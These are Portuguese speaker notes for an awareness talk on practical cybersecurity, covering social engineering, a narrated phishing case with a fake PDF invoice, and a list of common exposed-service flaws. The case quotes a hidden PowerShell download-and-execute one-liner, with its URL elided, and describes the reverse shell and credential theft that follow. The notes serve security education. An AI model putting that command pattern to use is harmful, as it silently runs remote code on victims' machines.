caderno-virtual/Palestras/Cybersegurança na prática.md

# Cybersegurança na prática: onde realmente os sistemas quebram

## Parte 0: Olá
Olá, meu nome é Álvaro, conhecido pelos apelidos **Russo Incendiário**
![](../Pasted%20image%2020260222135117.png)

Gosto muito de ciência, tecnologia e pirotecnia.

## Parte 1: Quebrando o mito
> *beep boop* - We're in

Cybersegurança não é hoodie + tela verde.
- Hackers não “adivinham senha”.
- Não é força bruta cinematográfica.
- É entender como o sistema funciona melhor que quem construiu.

Se você tem um cadeado que precisa ser aberto, você não precisa da chave. Você precisa entender como o cadeado funciona.

### Exercício mental
 Eu quero invadir sua casa. Quem eu chamo?
 1. Um ladrão profissional.
     ![Ladrão](../Pasted%20image%2020260222135251.png)
2. O chaveiro da esquina.
   ![O chaveiro](../Pasted%20image%2020260222135340.png)

## Parte 2: O Maior Vetor de Ataque Não É Técnico 
> “É mais fácil convencer alguém a abrir a porta do que arrombar a porta.”

Coloque na sua cabeça:
- Humanos são parte do sistema.
- Usuários são superfície de ataque.
- Confiança é explorável.
- Phishing funciona porque parece legítimo.
### Exercício mental
O que é mais fácil fazer para conseguir seus dados bancários?
1. Hackear a agência do Nubank
   ![](../Pasted%20image%2020260222135655.png)
2. Descobrir qual jogador do Real Madrid você seria. 
   ![](../Pasted%20image%2020260222135622.png)
## Parte 3: Conheça seu alvo
Pergunte para qualquer estrategista como vencer uma batalha. Sua provavelmente resposta será
> "Conheça seu inimigo"

### Exemplo de caso real
## Caso real (adaptado)
Uberlândia, 14h37.

O CEO de uma empresa local está no escritório.
Reuniões pela manhã.
Planilhas abertas.
WhatsApp Web piscando.
Ar-condicionado fraco — ele comenta com alguém da equipe.

No meio disso, ele confere os e-mails.

Assunto:
"Nota Fiscal – Fornecedor Atlas Comercial LTDA"

Nada estranho.
A empresa realmente tem fornecedores.
O layout do e-mail parece normal.
Assinatura, CNPJ, telefone.
Tudo plausível.

Ele abre.

Anexo:
nf-210230120310240102.zip

Ele extrai.

Dentro:
nf-210230120310240102.pdf

Ícone de PDF.
Nome de PDF.
Extensão de PDF.

Ele dá dois cliques.

Por menos de um segundo,
uma janela preta pisca na tela.

Ele nem percebe.
Acredita que o arquivo corrompeu.
Fecha.
Volta para o trabalho.

O que ele não viu:

O arquivo não era um PDF.
Era um atalho disfarçado.
Um pequeno script.

Algo equivalente a:

powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest ... | Invoke-Expression"

Em português simples:

“Baixe código da internet.
Execute.
Não mostre nada.”

Em menos de 3 segundos:

- Um agente é instalado.
- A máquina estabelece conexão reversa.
- Um servidor externo agora pode enviar comandos.
- A sessão está ativa.

Não houve:
- Exploit sofisticado.
- Zero-day.
- Quebra de criptografia.
- Força bruta.

Só um clique.

Nos dias seguintes:
- Credenciais salvas no navegador são extraídas.
- Tokens de sessão são copiados.
- Acesso ao sistema interno é mapeado.
- Pastas compartilhadas são indexadas.
- E-mails são lidos.
- Dados de clientes são copiados silenciosamente.

Nada trava.
Nada quebra.
Nada avisa.

Sem ransomware.
Sem tela vermelha.
Sem pedido de resgate.

Só coleta.

Meses depois,
a empresa descobre que seus dados estão sendo usados
para aplicar golpes em seus próprios clientes.

A pergunta não é:
“Como invadiram?”

A pergunta é:
Onde estava o parafuso solto?
## Parte 4: Vulnerabilidades do Mundo Real

### Caso 1: Sistema de Controle de Acesso vazando senhas de rede.

- SQL Injection em simulador
- PostgreSQL exposto sem autenticação
- Redis aberto (pode mencionar como exemplo clássico)